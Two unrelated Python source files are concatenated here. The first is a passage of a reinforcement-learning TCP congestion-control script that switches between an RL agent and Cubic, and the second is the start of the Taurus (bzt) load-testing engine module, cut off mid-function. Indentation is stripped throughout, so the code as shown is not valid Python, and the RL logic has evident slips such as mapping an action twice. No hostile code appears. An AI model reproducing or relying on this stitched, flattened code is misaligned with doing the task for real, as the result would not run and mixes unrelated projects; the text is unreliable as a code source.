EI_c_1 = 1 #
EI_r_1 = 2 #
EI_c_2 = 3 #receive ack of the class action and generate the reward
EI_r_2 = 4 #receive ack of the rl action and generate the reward
EI_sequence=0 #0:cl first 1:rl first
u_1=0
u_2=0
u_3=0
def main():
tf.get_logger().setLevel(logging.ERROR)
parser = argparse.ArgumentParser()
parser.add_argument('--load', action='store_true', default=False, help='default is %(default)s')
parser.add_argument('--eval', action='store_true', default=False, help='default is %(default)s')
parser.add_argument('--tb_interval', type=int, default=1)
parser.add_argument('--train_dir', type=str, default=None)
parser.add_argument('--mem_r', type=int, default = 123456)
parser.add_argument('--mem_w', type=int, default = 12345)
parser.add_argument('--base_path',type=str, required=True)
parser.add_argument('--job_name', type=str, choices=['learner', 'actor'], required=True, help='Job name: either {\'learner\', actor}')
parser.add_argument('--task', type=int, required=True, help='Task id')
## parameters from parser
global config
global params
config = parser.parse_args()
print("matthew:job name:"+str(config.job_name))
## parameters from file
params = Params(os.path.join(config.base_path,'params.json'))
print("Params:"+str(params.dict))
# print()
#parameters of the Orca itself
orca_state=Orca_state.Ordinary
th3=0.2
if params.dict['single_actor_eval']:
print("matthew:single_actor_eval")
local_job_device = ''
shared_job_device = ''
def is_actor_fn(i): return True
global_variable_device = '/cpu'
is_learner = False
print("matthew:create_local_server")
server = tf.train.Server.create_local_server()#会在本地创建一个单进程集群,该集群众的服务默认为启动状态
filters = []
else:
local_job_device = '/job:%s/task:%d' % (config.job_name, config.task)
shared_job_device = '/job:learner/task:0'
is_learner = config.job_name == 'learner'
print("matthew:is_learner1:"+str(is_learner))
global_variable_device = shared_job_device + '/cpu'
def is_actor_fn(i): return config.job_name == 'actor' and i == config.task
if params.dict['remote']:
cluster = tf.train.ClusterSpec({
'actor': params.dict['actor_ip'][:params.dict['num_actors']],
'learner': [params.dict['learner_ip']]
})
else:
cluster = tf.train.ClusterSpec({
'actor': ['localhost:%d' % (8001 + i) for i in range(params.dict['num_actors'])],
'learner': ['localhost:8000']
})
server = tf.train.Server(cluster, job_name=config.job_name,
task_index=config.task)
filters = [shared_job_device, local_job_device]
if params.dict['use_TCP']:
env_str = "TCP"
env_peek = TCP_Env_Wrapper(env_str, params,use_normalizer=params.dict['use_normalizer'])
else:
env_str = 'YourEnvironment'
env_peek = Env_Wrapper(env_str)
s_dim, a_dim = env_peek.get_dims_info()
action_scale, action_range = env_peek.get_action_info()
print("action_scale:"+str(action_scale))
print("action_range:"+str(action_range))
if not params.dict['use_TCP']:
params.dict['state_dim'] = s_dim
if params.dict['recurrent']:
s_dim = s_dim * params.dict['rec_dim']
if params.dict['use_hard_target'] == True:
params.dict['tau'] = 1.0
with tf.Graph().as_default(),\
tf.device(local_job_device + '/cpu'):
tf.set_random_seed(1234)
random.seed(1234)
np.random.seed(1234)
actor_op = []
now = datetime.datetime.now()
tfeventdir = os.path.join( config.base_path, params.dict['logdir'], config.job_name+str(config.task) )
# print("tfeventdir:"+tfeventdir)
params.dict['train_dir'] = tfeventdir
if not os.path.exists(tfeventdir):
os.makedirs(tfeventdir)
summary_writer = tf.summary.FileWriterCache.get(tfeventdir)
with tf.device(shared_job_device):
agent = Agent(s_dim, a_dim, batch_size=params.dict['batch_size'], summary=summary_writer,h1_shape=params.dict['h1_shape'],
h2_shape=params.dict['h2_shape'],stddev=params.dict['stddev'],mem_size=params.dict['memsize'],gamma=params.dict['gamma'],
lr_c=params.dict['lr_c'],lr_a=params.dict['lr_a'],tau=params.dict['tau'],PER=params.dict['PER'],CDQ=params.dict['CDQ'],
LOSS_TYPE=params.dict['LOSS_TYPE'],noise_type=params.dict['noise_type'],noise_exp=params.dict['noise_exp'])
dtypes = [tf.float32, tf.float32, tf.float32, tf.float32, tf.float32]
shapes = [[s_dim], [a_dim], [1], [s_dim], [1]]
queue = tf.FIFOQueue(10000, dtypes, shapes, shared_name="rp_buf")
if is_learner:
with tf.device(params.dict['device']):
agent.build_learn()
agent.create_tf_summary()
if config.load is True and config.eval==False:
if os.path.isfile(os.path.join(params.dict['train_dir'], "replay_memory.pkl")):
with open(os.path.join(params.dict['train_dir'], "replay_memory.pkl"), 'rb') as fp:
replay_memory = pickle.load(fp)
_killsignal = learner_killer(agent.rp_buffer)
for i in range(params.dict['num_actors']):
if is_actor_fn(i):
if params.dict['use_TCP']:
shrmem_r = sysv_ipc.SharedMemory(config.mem_r)
shrmem_w = sysv_ipc.SharedMemory(config.mem_w)
env = TCP_Env_Wrapper(env_str, params, config=config, for_init_only=False, shrmem_r=shrmem_r, shrmem_w=shrmem_w,use_normalizer=params.dict['use_normalizer'])
else:
env = GYM_Env_Wrapper(env_str, params)
a_s0 = tf.placeholder(tf.float32, shape=[s_dim], name='a_s0')
a_action = tf.placeholder(tf.float32, shape=[a_dim], name='a_action')
a_reward = tf.placeholder(tf.float32, shape=[1], name='a_reward')
a_s1 = tf.placeholder(tf.float32, shape=[s_dim], name='a_s1')
a_terminal = tf.placeholder(tf.float32, shape=[1], name='a_terminal')
a_buf = [a_s0, a_action, a_reward, a_s1, a_terminal]
with tf.device(shared_job_device):
actor_op.append(queue.enqueue(a_buf))
if is_learner:
Dequeue_Length = params.dict['dequeue_length']
dequeue = queue.dequeue_many(Dequeue_Length)
queuesize_op = queue.size()
if params.dict['ckptdir'] is not None:
params.dict['ckptdir'] = os.path.join( config.base_path, params.dict['ckptdir'])
print("## checkpoint dir:", params.dict['ckptdir'])
isckpt = os.path.isfile(os.path.join(params.dict['ckptdir'], 'checkpoint') )
print("## checkpoint exists?:", isckpt)
if isckpt== False:
print("\n# # # # # # Warning ! ! ! No checkpoint is loaded, use random model! ! ! # # # # # #\n")
else:
params.dict['ckptdir'] = tfeventdir
tfconfig = tf.ConfigProto(allow_soft_placement=True)
if params.dict['single_actor_eval']:
mon_sess = tf.train.SingularMonitoredSession(
checkpoint_dir=params.dict['ckptdir'])
else:
mon_sess = tf.train.MonitoredTrainingSession(master=server.target,
save_checkpoint_secs=15,
save_summaries_secs=None,
save_summaries_steps=None,
is_chief=is_learner,
checkpoint_dir=params.dict['ckptdir'],
config=tfconfig,
hooks=None)
agent.assign_sess(mon_sess)
if is_learner:
if config.eval is True:
print("=========================Learner is up===================")
while not mon_sess.should_stop():
time.sleep(1)
continue
if config.load is False:
agent.init_target()
counter = 0
start = time.time()
dequeue_thread = threading.Thread(target=learner_dequeue_thread, args=(agent,params, mon_sess, dequeue, queuesize_op, Dequeue_Length),daemon=True)
first_time=True
while not mon_sess.should_stop():
if first_time == True:
dequeue_thread.start()
first_time=False
up_del_tmp=params.dict['update_delay']/1000.0
time.sleep(up_del_tmp)
if agent.rp_buffer.ptr>200 or agent.rp_buffer.full :
agent.train_step()
if params.dict['use_hard_target'] == False:
agent.target_update()
if counter %params.dict['hard_target'] == 0 :
current_opt_step = agent.sess.run(agent.global_step)
logger.info("Optimize step:{}".format(current_opt_step))
logger.info("rp_buffer ptr:{}".format(agent.rp_buffer.ptr))
else:
if counter %params.dict['hard_target'] == 0 :
agent.target_update()
current_opt_step = agent.sess.run(agent.global_step)
logger.info("Optimize step:{}".format(current_opt_step))
logger.info("rp_buffer ptr:{}".format(agent.rp_buffer.ptr))
counter += 1
else:
start = time.time()
step_counter = np.int64(0)
eval_step_counter = np.int64(0)
s0 = env.reset()
s0_rec_buffer = np.zeros([s_dim])
s1_rec_buffer = np.zeros([s_dim])
s0_rec_buffer[-1*params.dict['state_dim']:] = s0
if params.dict['recurrent']:
a = agent.get_action(s0_rec_buffer,not config.eval)
else:
a = agent.get_action(s0, not config.eval)
a = env.map_action(a[0][0])#matthew
env.write_action(a)
print("matthew:a2:"+str(a))
prev_cwnd=a
epoch = 0
ep_r = 0.0
start = time.time()
count=0
while True:
print("")
print(count)
count+=1
start = time.time()
print("matthew: time:"+str(start))
epoch += 1
#这里的state意味着上一个episode的state,然后会根据不同情况决定下一个state是什么
step_counter += 1
s1, r, terminal, error_code,cwnd = env.step(a,eval_=config.eval)#这个action参数没啥用
print("matthew:s1:"+str(s1))
if orca_state==Orca_state.Ordinary:
# print("matthew:stage:Ordinary")
if error_code == True:
s1_rec_buffer = np.concatenate( (s0_rec_buffer[params.dict['state_dim']:], s1) )
if params.dict['recurrent']:
a_rl = agent.get_action(s1_rec_buffer, not config.eval)
else:
a_rl = agent.get_action(s1,not config.eval)
a_r= env.map_action(a_rl[0][0])#得到RL方法得到的action
a_c=cwnd#得到cubic得到的action
print("matthew:a_rl:"+str(a_r)+" a_cl:"+str(a_c))
if abs(env.map_action(a_r)-a_c)>=0.2*prev_cwnd:#prev_cwnd not defined yet
#进入evaluation stage
if(a_r-prev_cwnd)*(a_c-prev_cwnd)>=0 :
#进入EI,注意:进入EI和进入evaluation stage是不一样的
if a_r>a_c:
EI_sequence=1
a_final=a_r
orca_state=Orca_state.EI_r_1
else:
EI_sequence=0
a_final=a_c
orca_state=Orca_state.EI_c_1
else:
if (a_c-prev_cwnd)<0 :
a_final=a_c
else:
#进入EI
if a_r>a_c:
EI_sequence=1
a_final=a_r
orca_state=Orca_state.EI_r_1
else:
EI_sequence=0
a_final=a_c
orca_state=Orca_state.EI_c_1
elif orca_state==Orca_state.EI_c_1:
print("matthew:stage:EI_c_1")
if EI_sequence==0:#cl先行 下一个状态是EI_r_1
u_1=r#得到u1但是后续需要除episode的长度
orca_state=Orca_state.EI_r_1
a_final=a_r
else:
orca_state=Orca_state.EI_r_2
a_final=prev_cwnd
elif orca_state==Orca_state.EI_r_1:
print("matthew:stage:EI_r_1")
if EI_sequence==1:#rl先行 下一个状态是EI_c_1
u_1=r#得到u1但是后续需要除episode的长度
orca_state=Orca_state.EI_c_1
a_final=a_c
else:
orca_state=Orca_state.EI_c_2
a_final=prev_cwnd
elif orca_state==Orca_state.EI_c_2:
print("matthew:stage:EI_c_2")
if EI_sequence==0:#cl先行 下一个动作是EI_r_2
u_2=r#得到u2但是后续需要除episode的长度
orca_state=Orca_state.EI_r_2
# a_final=a_r
else:
orca_state=Orca_state.Ordinary#Evaluation结束进入Ordinary
u_3=r
if max(u_2,u_3)>=u_1:
if(u_2>u_3):#EI——sequence=1 rl先行
a_final=a_r
prev_cwnd=a_final
else:
a_final=a_c
prev_cwnd=a_final
else:
a_final=prev_cwnd
elif orca_state==Orca_state.EI_r_2:
print("matthew:stage:EI_r_2")
if EI_sequence==1:#rl先行 下一个动作是EI_c_2
u_2=r#得到u2但是后续需要除episode的长度
orca_state=Orca_state.EI_c_2
# a_final=a_r
else:
orca_state=Orca_state.Ordinary#Evaluation结束进入Ordinary
u_3=r
if max(u_2,u_3)>=u_1:
if(u_2>u_3):#EI——sequence=0 cl先行
a_final=a_c
prev_cwnd=a_final
else:
a_final=a_r
prev_cwnd=a_final
else:
a_final=prev_cwnd
# step_counter += 1
# s1, r, terminal, error_code,cwnd = env.step(a,eval_=config.eval)
# print("matthew:state:"+str(s1))
# if error_code == True:
# s1_rec_buffer = np.concatenate( (s0_rec_buffer[params.dict['state_dim']:], s1) )
# if params.dict['recurrent']:
# a_rl = agent.get_action(s1_rec_buffer, not config.eval)
# else:
# a_rl = agent.get_action(s1,not config.eval)
# a_final = env.map_action(a_rl[0][0])
env.write_action(a_final)
print("matthew:a3:"+str(a_final))
else:
print("TaskID:"+str(config.task)+"Invalid state received...\n")
env.write_action(a)
continue
if params.dict['recurrent']:
fd = {a_s0:s0_rec_buffer, a_action:a, a_reward:np.array([r]), a_s1:s1_rec_buffer, a_terminal:np.array([terminal], np.float)}
else:
fd = {a_s0:s0, a_action:a, a_reward:np.array([r]), a_s1:s1, a_terminal:np.array([terminal], np.float)}
if not config.eval:
mon_sess.run(actor_op, feed_dict=fd)
s0 = s1
a = a_final
if params.dict['recurrent']:
s0_rec_buffer = s1_rec_buffer
if not params.dict['use_TCP'] and (terminal):
if agent.actor_noise != None:
agent.actor_noise.reset()
if (epoch% params.dict['eval_frequency'] == 0):
eval_step_counter = evaluate_TCP(env, agent, epoch, summary_writer, params, s0_rec_buffer, eval_step_counter)
print("total time:", time.time()-start)
def learner_dequeue_thread(agent,params, mon_sess, dequeue, queuesize_op, Dequeue_Length):
ct = 0
while True:
ct = ct + 1
data = mon_sess.run(dequeue)
agent.store_many_experience(data[0], data[1], data[2], data[3], data[4], Dequeue_Length)
time.sleep(0.01)
def learner_update_thread(agent,params):
delay=params.dict['update_delay']/1000.0
ct = 0
while True:
agent.train_step()
agent.target_update()
time.sleep(delay)
if __name__ == "__main__":
main()
|
engine.py | """
Main BZT classes
Copyright 2015 BlazeMeter Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import codecs
import copy
import datetime
import json
import logging
import os
import pkgutil
import shutil
import sys
import threading
import time
import traceback
import uuid
from distutils.version import LooseVersion
from urllib import parse
from bzt import ManualShutdown, get_configs_dir, TaurusConfigError, TaurusInternalException
from bzt.utils import reraise, load_class, BetterDict, ensure_is_dict, dehumanize_time, is_windows, is_linux
from bzt.utils import shell_exec, get_full_path, ExceptionalDownloader, get_uniq_name, HTTPClient, Environment
from .dicts import Configuration
from .modules import Provisioning, Reporter, Service, Aggregator, EngineModule
from .names import EXEC, TAURUS_ARTIFACTS_DIR, SETTINGS
from .templates import Singletone
from ..environment_helpers import expand_variable_with_os, custom_expandvars, expand_envs_with_os
from bzt.resources.version import VERSION
class Engine(object):
"""
Core entity of the technology, used to coordinate whole process
:type reporters: list[Reporter]
:type services: list[Service]EXEC
:type log: logging.Logger
:type aggregator: bzt.modules.aggregator.ConsolidatingAggregator
:type stopping_reason: BaseException
"""
ARTIFACTS_DIR = "%Y-%m-%d_%H-%M-%S.%f"
def __init__(self, parent_logger):
"""
:type parent_logger: logging.Logger
"""
self.file_search_paths = []
self.services = []
self.__artifacts = []
self.reporters = []
self.artifacts_dir = None
self.log = parent_logger.getChild(self.__class__.__name__)
self.env = Environment(self.log) # backward compatibility
self.shared_env = Environment(self.log) # backward compatibility
self.config = Configuration()
self.config.log = self.log.getChild(Configuration.__name__)
self.modules = {} # available modules
self.provisioning = Provisioning()
self.aggregator = Aggregator(is_functional=False)
self.aggregator.engine = self
self.interrupted = False
self.check_interval = 1
self.stopping_reason = None
self.engine_loop_utilization = 0
self.prepared = []
self.started = []
self.default_cwd = None
self.logging_level_down = lambda: None
self.logging_level_up = lambda: None
self.user_pythonpath = None
self.temp_pythonpath = None
self._http_client = None
def set_pythonpath(self):
version = sys.version.split(' ')[0]
path_suffix = os.path.join('python-packages', version)
self.user_pythonpath = get_full_path(os.path.join("~", ".bzt", path_suffix))
self.temp_pythonpath = get_full_path(os.path.join(self.artifacts_dir, path_suffix))
current_pythonpath = os.environ.get('PYTHONPATH', '')
paths = self.user_pythonpath, self.temp_pythonpath, current_pythonpath
self.log.debug("Set PYTHONPATH to :\n\tUSER: '{}' +\n\tTEMP: '{}' +\n\tCURRENT: '{}'".format(*paths))
try:
user_packages = os.listdir(self.user_pythonpath)
except:
user_packages = []
self.log.debug("Content of user packages dir: {}".format(user_packages))
os.environ['PYTHONPATH'] = os.pathsep.join(paths)
def configure(self, user_configs, read_config_files=True):
"""
Load configuration files
:type user_configs: list[str]
:type read_config_files: bool
"""
self.log.info("Configuring...")
if read_config_files:
self._load_base_configs()
merged_config = self._load_user_configs(user_configs)
all_includes = []
while "included-configs" in self.config:
includes = self.config.pop("included-configs")
included_configs = [self.find_file(conf) for conf in includes if conf not in all_includes + user_configs]
all_includes += includes
self.config.load(included_configs)
self.config['included-configs'] = all_includes
self.config.merge({"version": VERSION})
self.get_http_client()
if self.config.get(SETTINGS).get("check-updates", True):
install_id = self.config.get("install-id", self._generate_id())
def wrapper():
return self._check_updates(install_id)
thread = threading.Thread(target=wrapper) # intentionally non-daemon thread
thread.start()
return merged_config
def unify_config(self):
executions = self.config.get(EXEC, [])
if isinstance(executions, dict):
executions = [executions]
self.config[EXEC] = executions
settings = self.config.get(SETTINGS)
default_executor = settings.get("default-executor", None)
prov_type = self.config.get(Provisioning.PROV)
for execution in executions: # type: BetterDict
executor = execution.get("executor", default_executor, force_set=True)
if not executor:
msg = "Cannot determine executor type and no default executor in %s"
raise TaurusConfigError(msg % execution)
reporting = self.config.get(Reporter.REP, [])
for index in range(len(reporting)):
ensure_is_dict(reporting, index, "module")
services = self.config.get(Service.SERV, [])
for index in range(len(services)):
ensure_is_dict(services, index, "module")
modules = self.config.get("modules")
for module in modules:
ensure_is_dict(modules, module, "class")
@staticmethod
def _generate_id():
if os.getenv("JENKINS_HOME"):
prefix = "jenkins"
elif os.getenv("TRAVIS"):
prefix = "travis"
elif any([key.startswith("bamboo") for key in os.environ.keys()]):
prefix = "bamboo"
elif os.getenv("TEAMCITY_VERSION"):
prefix = "teamcity"
elif os.getenv("DOCKER_HOST"):
prefix = "docker"
elif os.getenv("AWS_"):
prefix = "amazon"
elif os.getenv("GOOGLE_APPLICATION_CREDENTIALS") or os.getenv("CLOUDSDK_CONFIG"):
prefix = "google_cloud"
elif os.getenv("WEBJOBS_NAME"):
prefix = "azure"
elif is_linux():
prefix = 'linux'
elif is_windows():
prefix = 'windows'
else:
prefix = 'macos'
return "%s-%x" % (prefix, uuid.getnode())
def prepare(self):
"""
Prepare engine for work, will call preparing of Provisioning and add
downstream EngineModule instances
"""
self.log.info("Preparing...")
self.unify_config()
interval = self.config.get(SETTINGS).get("check-interval", self.check_interval)
self.check_interval = dehumanize_time(interval)
try:
self.__prepare_aggregator()
self.__prepare_services()
self.__prepare_provisioning()
self.__prepare_reporters()
self.config.dump()
except BaseException as exc:
self.stopping_reason = exc
raise
def _startup(self):
modules = self.services + [self.aggregator] + self.reporters + [self.provisioning] # order matters
for module in modules:
self.log.debug("Startup %s", module)
self.started.append(module)
module.startup()
self.config.dump()
def start_subprocess(self, args, env, cwd=None, **kwargs):
if cwd is None:
cwd = self.default_cwd
return shell_exec(args, cwd=cwd, env=env.get(), **kwargs)
def run(self):
"""
Run the job. Calls `startup`, does periodic `check`,
calls `shutdown` in any case
"""
self.log.info("Starting...")
exc_info = exc_value = None
try:
self._startup()
self.logging_level_down()
self._wait()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
exc_value = exc
exc_info = sys.exc_info()
finally:
self.log.warning("Please wait for graceful shutdown...")
try:
self.logging_level_up()
self._shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
if exc_value:
reraise(exc_info, exc_value)
def _check_modules_list(self):
stop = False
modules = [self.provisioning, self.aggregator] + self.services + self.reporters # order matters
for module in modules:
if module in self.started:
self.log.debug("Checking %s", module)
finished = bool(module.check())
if finished:
self.log.debug("%s finished", module)
stop = finished
return stop
def _wait(self):
"""
Wait modules for finish
:return:
"""
prev = time.time()
while not self._check_modules_list():
now = time.time()
diff = now - prev
delay = self.check_interval - diff
self.engine_loop_utilization = diff / self.check_interval
self.log.debug("Iteration took %.3f sec, sleeping for %.3f sec...", diff, delay)
if delay > 0:
time.sleep(delay)
prev = time.time()
if self.interrupted:
raise ManualShutdown()
self.config.dump()
def _shutdown(self):
"""
Shutdown modules
:return:
"""
self.log.info("Shutting down...")
self.log.debug("Current stop reason: %s", self.stopping_reason)
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
for module in modules:
try:
if module in self.started:
module.shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
self.config.dump()
if exc_value:
reraise(exc_info, exc_value)
def post_process(self):
"""
Do post-run analysis and processing for the results.
"""
self.log.info("Post-processing...")
# :type exception: BaseException
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
# services are last because of shellexec which is "final-final" action
for module in modules:
if module in self.prepared:
try:
module.post_process()
except BaseException as exc:
if isinstance(exc, KeyboardInterrupt):
self.log.debug("post_process: %s", exc)
else:
self.log.debug("post_process: %s\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
self.config.dump()
if exc_info:
reraise(exc_info, exc_value)
def create_artifact(self, prefix, suffix):
"""
Create new artifact in artifacts dir with given prefix and suffix
:type prefix: str
:type suffix: str
:return: Path to created file
:rtype: str
:raise TaurusInternalException: if no artifacts dir set
"""
if not self.artifacts_dir:
raise TaurusInternalException("Cannot create artifact: no artifacts_dir set up")
filename = get_uniq_name(self.artifacts_dir, prefix, suffix, self.__artifacts)
self.__artifacts.append(filename)
self.log.debug("New artifact filename: %s", filename)
return filename
def existing_artifact(self, filename, move=False, target_filename=None):
"""
Add existing artifact, it will be collected into artifact_dir. If
move=True, the original file will be deleted
:type filename: str
:type move: bool
:type target_filename: str
"""
self.log.debug("Add existing artifact (move=%s): %s", move, filename)
if self.artifacts_dir is None:
self.log.warning("Artifacts dir has not been set, will not copy %s", filename)
return
new_filename = os.path.basename(filename) if target_filename is None else target_filename
new_name = os.path.join(self.artifacts_dir, new_filename)
self.__artifacts.append(new_name)
if get_full_path(filename) == get_full_path(new_name):
self.log.debug("No need to copy %s", filename)
return
if not os.path.exists(filename):
self.log.warning("Artifact file not exists: %s", filename)
return
if move:
self.log.debug("Moving %s to %s", filename, new_name)
shutil.move(filename, new_name)
else:
self.log.debug("Copying %s to %s", filename, new_name)
shutil.copy(filename, new_name)
def create_artifacts_dir(self, existing_artifacts=(), merged_config=None):
"""
Create directory for artifacts, directory name based on datetime.now()
"""
if not self.artifacts_dir:
artifacts_dir = self.config.get(SETTINGS, force_set=True).get("artifacts-dir", self.ARTIFACTS_DIR)
self.artifacts_dir = datetime.datetime.now().strftime(artifacts_dir)
self.artifacts_dir = self.__expand_artifacts_dir()
self.log.info("Artifacts dir: %s", self.artifacts_dir)
os.environ[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
if not os.path.isdir(self.artifacts_dir):
os.makedirs(self.artifacts_dir)
# dump current effective configuration
dump = self.create_artifact("effective", "") # TODO: not good since this file not exists
self.config.set_dump_file(dump)
self.config.dump()
# dump merged configuration
if merged_config:
merged_config.dump(self.create_artifact("merged", ".yml"), Configuration.YAML)
merged_config.dump(self.create_artifact("merged", ".json"), Configuration.JSON)
for artifact in existing_artifacts:
self.existing_artifact(artifact)
def __expand_artifacts_dir(self):
envs = self.__get_envs_from_config()
artifacts_dir = custom_expandvars(self.artifacts_dir, envs)
artifacts_dir = expand_variable_with_os(artifacts_dir)
artifacts_dir = get_full_path(artifacts_dir)
return artifacts_dir
def is_functional_mode(self):
return self.aggregator is not None and self.aggregator.is_functional
def __load_module(self, alias):
"""
Load module class by alias
:param alias: str
:return: class
"""
if alias in self.modules:
return self.modules[alias]
mod_conf = self.config.get('modules')
if alias not in mod_conf:
msg = "Module '%s' not found in list of available aliases %s" % (alias, sorted(mod_conf.keys()))
raise TaurusConfigError(msg)
settings = ensure_is_dict(mod_conf, alias, "class")
acopy = copy.deepcopy(settings)
BetterDict.traverse(acopy, Configuration.masq_sensitive)
self.log.debug("Module config: %s %s", alias, acopy)
err = TaurusConfigError("Class name for alias '%s' is not found in module settings: %s" % (alias, settings))
clsname = settings.get('class', err)
self.modules[alias] = load_class(clsname)
if not issubclass(self.modules[alias], EngineModule):
raise TaurusInternalException("Module class does not inherit from EngineModule: %s" % clsname)
return self.modules[alias]
def instantiate_module(self, alias):
"""
Create new instance for module using its alias from module settings
section of config. Thus, to instantiate module it should be mentioned
in settings.
:type alias: str
:rtype: EngineModule
"""
classobj = self.__load_module(alias)
instance = classobj()
assert isinstance(instance, EngineModule)
instance.log = self.log.getChild(alias)
instance.engine = self
settings = self.config.get("modules")
instance.settings = settings.get(alias)
return instance
def find_file(self, filename):
"""
Try to find file or dir in search_path if it was specified. Helps finding files
in non-CLI environments or relative to config path
Return path is full and mustn't treat with abspath/etc.
:param filename: file basename to find
:type filename: str
"""
if not filename:
return filename
if filename.lower().startswith("http://") or filename.lower().startswith("https://"):
parsed_url = parse.urlparse(filename)
downloader = ExceptionalDownloader(self.get_http_client())
self.log.info("Downloading %s", filename)
tmp_f_name, headers = downloader.get(filename)
cd_header = headers.get('Content-Disposition', '')
dest = cd_header.split('filename=')[-1] if cd_header and 'filename=' in cd_header else ''
if dest.startswith('"') and dest.endswith('"') or dest.startswith("'") and dest.endswith("'"):
dest = dest[1:-1]
elif not dest:
dest = os.path.basename(parsed_url.path)
fname, ext = os.path.splitext(dest) if dest else (parsed_url.hostname.replace(".", "_"), '.file')
dest = self.create_artifact(fname, ext)
self.log.debug("Moving %s to %s", tmp_f_name, dest)
shutil.move(tmp_f_name, dest)
return dest
else:
filename = os.path.expanduser(filename) # expanding of '~' is required for check of existence
# check filename 'as is' and all combinations of file_search_path/filename
for dirname in [""] + self.file_search_paths:
location = os.path.join(dirname, filename)
if os.path.exists(location):
if dirname:
self.log.warning("Guessed location from search paths for %s: %s", filename, location)
return get_full_path(location)
self.log.warning("Could not find location at path: %s", filename)
return filename
def _load_base_configs(self):
configs = []
try:
sys.path.insert(0, os.path.curdir) # necessary for development mode (running bzt from curdir)
configs.extend(self._scan_system_configs())
configs.extend(self._scan_package_configs())
finally:
sys.path.pop(0)
configs.sort(key=os.path.basename)
self.log.debug("Base configs list: %s", configs)
if not configs:
self.log.warning("No base configs were discovered")
self.config.load(configs)
def _scan_package_configs(self):
configs = []
for importer, modname, ispkg in pkgutil.iter_modules(path=None):
try:
if not ispkg:
continue
package_path = getattr(importer, 'path', None)
if package_path is None:
continue
index_path = os.path.join(package_path, modname, 'bzt-configs.json')
if not os.path.exists(index_path):
continue
try:
with codecs.open(index_path, 'rb', encoding='utf-8') as fds:
index_configs = json.load(fds)
except (OSError, IOError, ValueError) as exc:
self.log.debug("Can't load package-specific bzt config %s: %s", index_path, exc)
continue
if not isinstance(index_configs, list):
self.log.debug("Error: value of bzt-configs.json should be a list (%s)" % index_path)
continue
for config_name in index_configs:
configs.append(os.path.join(importer.path, modname, config_name))
except BaseException as exc:
self.log.warning("Can't look for package configs in package %r: %s", modname, str(exc))
self.log.debug("Traceback: %s", traceback.format_exc())
return configs
def _scan_system_configs(self):
configs = []
machine_dir = get_configs_dir() # can't refactor machine_dir out - see setup.py
if os.path.isdir(machine_dir):
self.log.debug("Reading system configs from: %s", machine_dir)
for cfile in sorted(os.listdir(machine_dir)):
fname = os.path.join(machine_dir, cfile)
if os.path.isfile(fname):
configs.append(fname)
return configs
def _load_user_configs(self, user_configs):
"""
:type user_configs: list[str]
:rtype: Configuration
"""
# "tab-replacement-spaces" is not documented 'cause it loads only from base configs
# so it's sort of half-working last resort
self.config.tab_replacement_spaces = self.config.get(SETTINGS).get("tab-replacement-spaces", 4)
self.log.debug("User configs list: %s", user_configs)
self.config.load(user_configs)
user_config = Configuration()
user_config.log = self.log.getChild(Configuration.__name__)
user_config.tab_replacement_spaces = self.config.tab_replacement_spaces
user_config.warn_on_tab_replacement = False
user_config.load(user_configs, self.__config_loaded)
return user_config
def __config_loaded(self, config):
self.file_search_paths.append(get_full_path(config, step_up=1))
def __prepare_provisioning(self):
"""
Instantiate provisioning class
"""
err = TaurusConfigError("Please check global config availability or configure provisioning settings")
cls = self.config.get(Provisioning.PROV, err)
self.provisioning = self.instantiate_module(cls)
self.prepared.append(self.provisioning)
self.provisioning.prepare()
def __prepare_reporters(self):
"""
Instantiate reporters, then prepare them in case they would like to interact
"""
reporting = self.config.get(Reporter.REP, [])
for index, reporter in enumerate(reporting):
msg = "reporter 'module' field isn't recognized: %s"
cls = reporter.get('module', TaurusConfigError(msg % reporter))
instance = self.instantiate_module(cls)
instance.parameters = reporter
if self.__singletone_exists(instance, self.reporters):
continue
assert isinstance(instance, Reporter)
self.reporters.append(instance)
for reporter in self.reporters[:]:
if not reporter.should_run():
self.reporters.remove(reporter)
# prepare reporters
for module in self.reporters:
self.prepared.append(module)
module.prepare()
def __prepare_services(self):
"""
Instantiate service modules, then prepare them
"""
srv_config = self.config.get(Service.SERV, [])
services = []
for index, config in enumerate(srv_config):
cls = config.get('module', '')
instance = self.instantiate_module(cls)
instance.parameters = config
if self.__singletone_exists(instance, services):
continue
assert isinstance(instance, Service)
services.append(instance)
for service in services[:]:
if not service.should_run():
services.remove(service)
self.services.extend(services)
for module in self.services:
self.prepared.append(module)
module.prepare()
def __singletone_exists(self, instance, mods_list):
"""
:type instance: EngineModule
:type mods_list: list[EngineModule]
:rtype: bool
"""
if not isinstance(instance, Singletone):
return False
for mod in mods_list:
if mod.parameters.get("module") == instance.parameters.get("module"):
msg = "Module '%s' can be only used once, will merge all new instances into single"
self.log.warning(msg % mod.parameters.get("module"))
mod.parameters.merge(instance.parameters)
return True
return False
def __prepare_aggregator(self):
"""
Instantiate aggregators
:return:
"""
cls = self.config.get(SETTINGS).get("aggregator", "")
if not cls:
self.log.warning("Proceeding without aggregator, no results analysis")
else:
self.aggregator = self.instantiate_module(cls)
self.prepared.append(self.aggregator)
self.aggregator.prepare()
def get_http_client(self):
if self._http_client is None:
self._http_client = HTTPClient()
self._http_client.add_proxy_settings(self.config.get("settings").get("proxy"))
return self._http_client
def _check_updates(self, install_id):
try:
params = (VERSION, install_id)
addr = "https://gettaurus.org/updates/?version=%s&installID=%s" % params
self.log.debug("Requesting updates info: %s", addr)
client = self.get_http_client()
